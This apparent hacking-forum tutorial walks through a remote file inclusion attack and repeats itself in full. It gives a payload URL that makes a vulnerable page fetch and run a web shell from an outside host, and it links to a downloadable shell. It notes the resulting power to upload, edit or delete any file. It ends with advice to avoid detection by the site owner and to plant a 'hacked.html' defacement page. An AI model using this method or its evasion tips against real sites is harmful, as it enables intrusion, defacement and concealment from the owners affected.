03-01-2015, 04:35 PM
FOR EDUCATIONAL PURPOSES ONLY!
Firstly you will need our RFI test sheet
http://pastebin.com/PJ5K8fKj
Upload that to your server and save it as RFI.php.
When you access that file via a web browser it will look like this
Very fancy
But the idea of this page is to open a file in the same page kinda like an iframe.
If we browse to http://www.mysite.com/rfi.php?page=http://www.google.co.uk/ (Take note of the location of http://www.google.co.uk/)
This page is going to run anything that is after rfi.php?page= in the url. With that in mind we now understand that a shell can be executed from the server.
So now you must upload a shell to our server,
if we don't already own a shell we can download a free shell here
http://www.multiupload.com/REU9V5EQAF
Ok now it is uploaded to our server we must now inject it into the RFI test sheet. Like this http://www.mysite.com/rfi.php?page=http://www.mysite.com/shell.txt? we include the last ? to tell the page to run the code and not to display the page/code.
Now you will see that the site has executed the shells code as if it was part of the original page .
Meaning we can now upload,edit,delete any file we please to.
Do not change the index of the site as the owner may catch you.
Upload a hacked.html page .
Firstly you will need our RFI test sheet
http://pastebin.com/PJ5K8fKj
Upload that to your server and save it as RFI.php.
When you access that file via a web browser it will look like this
Very fancy
But the idea of this page is to open a file in the same page kinda like an iframe.
If we browse to http://www.mysite.com/rfi.php?page=http://www.google.co.uk/ (Take note of the location of http://www.google.co.uk/)
This page is going to run anything that is after rfi.php?page= in the url. With that in mind we now understand that a shell can be executed from the server.
So now you must upload a shell to our server,
if we don't already own a shell we can download a free shell here
http://www.multiupload.com/REU9V5EQAF
Ok now it is uploaded to our server we must now inject it into the RFI test sheet. Like this http://www.mysite.com/rfi.php?page=http://www.mysite.com/shell.txt? we include the last ? to tell the page to run the code and not to display the page/code.
Now you will see that the site has executed the shells code as if it was part of the original page .
Meaning we can now upload,edit,delete any file we please to.
Do not change the index of the site as the owner may catch you.
Upload a hacked.html page .